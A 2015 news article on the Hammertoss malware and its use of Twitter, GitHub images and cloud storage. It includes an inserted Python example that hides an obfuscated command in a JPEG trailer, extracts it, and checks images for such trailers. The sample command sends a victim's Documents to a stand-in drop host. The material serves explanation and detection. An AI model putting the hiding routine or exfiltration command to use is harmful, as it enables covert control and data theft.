
Hammertoss malware uses Twitter, GitHub to assemble itself

By Shawn Knight
Jul 30, 2015
Security firm FireEye has uncovered a piece of malware that may be much harder than usual to detect. It is called Hammertoss, and according to the company it is likely being used by a state-sponsored hacking group with Russian ties.

As a general rule, security products look for unusual behavior, such as a piece of malware or a virus in action, as a first line of defense. If something is off, a red flag goes up and the product digs deeper to find the cause.

Hammertoss, however, is designed to go undetected because it mimics the system's user: you.

Upon successful infection, Hammertoss turns to Twitter, checking for messages from specific accounts that tell it what to do next. From there it heads to GitHub, where it fetches an image with its next instructions hidden inside the file. Once it has essentially assembled itself, it begins uploading data from the target computer to a cloud storage service where the operators can retrieve it. Each of those hops is ordinary-looking traffic to a popular, legitimate service, which is what lets the chain blend in with a user's normal activity.

FireEye says it has not seen this level of sophistication before.

As you might expect, Hammertoss has so far been used against only a few very high-value targets. Hackers with the skills needed to create it would not bother swiping photos or credit card data from random citizens; it is too complicated and likely too expensive to use for that.

Or, as FireEye threat researcher Jordan Berry notes, they use it sparingly so that it remains effective.

As word about it spreads, however, cybercriminals may well adopt its techniques.
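To make the image step concrete, here is an added example (my own illustration, not code from FireEye's report or from Hammertoss itself): one generic way a command can ride inside a JPEG that still opens as a normal picture, alongside the structural check a defender can run on images pulled from code-hosting or social sites to spot the hidden trailer. The JPEG bytes, the command text, the key and the trailer layout are all constructed assumptions for this example; the article does not describe Hammertoss's actual encoding, and this code does not claim to reproduce it.

```python
# Added example, not FireEye's analysis code and not Hammertoss itself.
# It shows one generic way a command can ride inside an otherwise valid
# image (appended after the JPEG end-of-image marker, lightly obfuscated)
# and the structural check a defender can run on fetched images to spot
# such a trailer. The JPEG bytes, the command and the key are constructed
# for this example; the trailer layout is an assumption, not a format
# documented for Hammertoss.
import hashlib
import struct

EOI, SOS = 0xD9, 0xDA

# Constructed minimal JPEG: SOI, APP0, SOS header, a little entropy-coded
# data (with a stuffed 0xFF00 and an RST0 marker, both of which a scanner
# must skip), then EOI. Not a viewable photo, but structurally valid.
CLEAN_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0\x00\x10" + b"JFIF\x00" + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda\x00\x08" + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\xff\x00\x34\xff\xd0\x56"
    + b"\xff\xd9"
)
COMMAND = b"upload C:\\Users\\victim\\Documents to https://cloud.invalid/drop"  # constructed
KEY = b"example-key"  # constructed


def jpeg_end(image: bytes) -> int:
    """Offset just past the EOI marker, found by walking the segment structure.

    Walking segments (rather than searching for the last 0xFFD9) means a
    payload that itself contains 0xFFD9 cannot hide the trailer.
    """
    if image[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(image):
        if image[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = image[pos + 1]
        if marker == EOI:
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:
            pos += 2  # TEM, RSTn, SOI: standalone markers without a length field
            continue
        if pos + 4 > len(image):
            raise ValueError("truncated segment header")
        seglen = struct.unpack(">H", image[pos + 2:pos + 4])[0]
        pos += 2 + seglen
        if marker == SOS:
            # Entropy-coded data follows. Inside it 0xFF is always followed by
            # 0x00 (byte stuffing) or 0xD0-0xD7 (restart); anything else is a real marker.
            while pos + 1 < len(image):
                nxt = image[pos + 1]
                if image[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_bytes(image: bytes) -> int:
    """Number of bytes after the image proper; a clean file gives 0."""
    return len(image) - jpeg_end(image)


def _keystream(key: bytes, n: int) -> bytes:
    """SHA-256 counter keystream; obfuscation only, not a real cipher."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def embed_command(image: bytes, command: bytes, key: bytes) -> bytes:
    """Append [4-byte length][XOR-masked command] after EOI (assumed layout)."""
    masked = bytes(c ^ k for c, k in zip(command, _keystream(key, len(command))))
    return image + struct.pack(">I", len(masked)) + masked


def extract_command(image: bytes, key: bytes) -> bytes:
    """Recover a command hidden by embed_command; raises if there is no trailer."""
    start = jpeg_end(image)
    if len(image) < start + 4:
        raise ValueError("no trailer after EOI")
    (n,) = struct.unpack(">I", image[start:start + 4])
    masked = image[start + 4:start + 4 + n]
    if len(masked) != n:
        raise ValueError("trailer length field exceeds file size")
    return bytes(c ^ k for c, k in zip(masked, _keystream(key, n)))


if __name__ == "__main__":
    stego = embed_command(CLEAN_JPEG, COMMAND, KEY)
    print("clean trailer bytes:", trailing_bytes(CLEAN_JPEG))
    print("stego trailer bytes:", trailing_bytes(stego))
    print("recovered:", extract_command(stego, KEY))
```

The defender's side is `trailing_bytes`: an image fetched right after a visit to a social-media page that then precedes an upload to cloud storage, and that carries bytes past its EOI marker, deserves a closer look. Treat it as a triage signal rather than proof, since some cameras and editors legitimately append data after the image, and since a more careful implant could hide its instructions in pixel values rather than a trailer, which this check would not see.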


jobeard (TS Ambassador, Posts: 9,939, +737)

Ouch; this algorithm is a nightmare:
• access object-A, even a possibly signed and verified object-A
• access another object-B ... signed or otherwise
• object-A and object-B can be perfectly safe web objects (e.g. JPGs)
• yet parse(object-A) + parse(object-B) => virus payload in memory
Just proves the point that the weakest link in security is the user+browser :(
